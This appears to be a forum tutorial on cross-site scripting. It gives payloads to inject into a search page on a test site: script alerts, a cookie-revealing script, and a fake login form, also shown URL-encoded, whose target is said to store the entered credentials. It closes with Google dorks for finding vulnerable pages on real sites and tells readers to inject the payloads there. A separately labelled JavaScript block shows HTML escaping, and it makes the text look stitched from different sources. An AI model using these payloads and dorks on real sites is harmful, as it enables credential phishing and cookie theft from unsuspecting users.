|TUT| CROSS SITE SCRIPTING (XSS)
Cross-site scripting is an attack in which script embedded in a page is executed on the client side, in the visitor's browser, rather than on the server. It is the process of injecting JavaScript and HTML for the purpose of stealing critical information such as user credentials and other important personal details. The stolen information mainly consists of the user's cookies and login information.
XSS can be considered a dangerous exploit because most web pages are user interactive. For the purpose of interaction, a web page provides fields for comments, search and even feedback. 90 percent of user-interactive websites are vulnerable to this type of attack, though some percentage of sites have a high risk of exploitation.
For testing XSS you can inject a script like:
Code:
<h1>welcome</h1>
Code:
<script>alert("hello")</script>
To give it a try, click the link http://testasp.vulnweb.com/Search.asp
Insert the codes below:
Code:
code 1: <h1>XSSED</h1>
code 2: <script>alert("XSSED")</script>
code 3: <img src="URL OF THE IMAGE"></img>
code 4: <br><br>Login to proceed:<form action="destination.asp"><table><tr><td>Login:</td><td><input type=text length=10 name=login></td></tr><tr><td>Password:</td><td><input type=text length=10 name=password></td></tr></table><input type=submit value=LOGIN></form>
Here destination.asp can be a script that stores the data entered in the fields.
This code can be injected directly into the URL as follows:
Code:
http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type%3Dsubmit+value%3DLOGIN%3E%3C%2Fform%3E
code 5: <script>alert(document.cookie)</script>
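All of the test strings above work only because the page writes the search term back into its HTML without encoding it. The sketch below is an added example, not code from the original tutorial or from the test site: it renders a results line with and without HTML encoding and checks the tutorial's strings against both. The function names and the page template are assumptions.

```javascript
// Added example: function names and the page template are hypothetical.

// Characters that change meaning in HTML text and in quoted attribute values.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Decode a query-string value the way a form submission encodes it ("+" is a space).
function decodeQueryValue(raw) {
  return decodeURIComponent(raw.replace(/\+/g, " "));
}

const PREFIX = "<p>You searched for: ";
const SUFFIX = "</p>";

// Vulnerable: the search term is concatenated into the markup unchanged.
function renderResultsUnsafe(term) {
  return PREFIX + term + SUFFIX;
}

// Hardened: the term is encoded for the HTML context before being written out.
function renderResultsSafe(term) {
  return PREFIX + escapeHtml(term) + SUFFIX;
}

// True when the part of the page that came from the user still contains a tag opener.
function containsInjectedMarkup(html) {
  const reflected = html.slice(PREFIX.length, html.length - SUFFIX.length);
  return /<[a-z!\/]/i.test(reflected);
}

// Test strings taken from the tutorial, plus one harmless search (constructed).
const SAMPLES = [
  "<h1>XSSED</h1>",
  '<script>alert("XSSED")</script>',
  "<script>alert(document.cookie)</script>",
  decodeQueryValue("%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E"),
  "holiday photos",
];

// For each sample, report whether markup survives in the unsafe and the safe page.
function auditSamples() {
  return SAMPLES.map((term) => ({
    term,
    unsafe: containsInjectedMarkup(renderResultsUnsafe(term)),
    safe: containsInjectedMarkup(renderResultsSafe(term)),
  }));
}

for (const row of auditSamples()) console.log(row);
```

With encoding applied, each string is shown to the visitor as literal text instead of being parsed as a tag.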
To find the vulnerable pages we can use some XSS dorks like:
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
/preaspjobboard//Employee/emp_login.asp?msg1=
pages/match_report.php?mid=
Type any of the dorks into Google and input the codes given.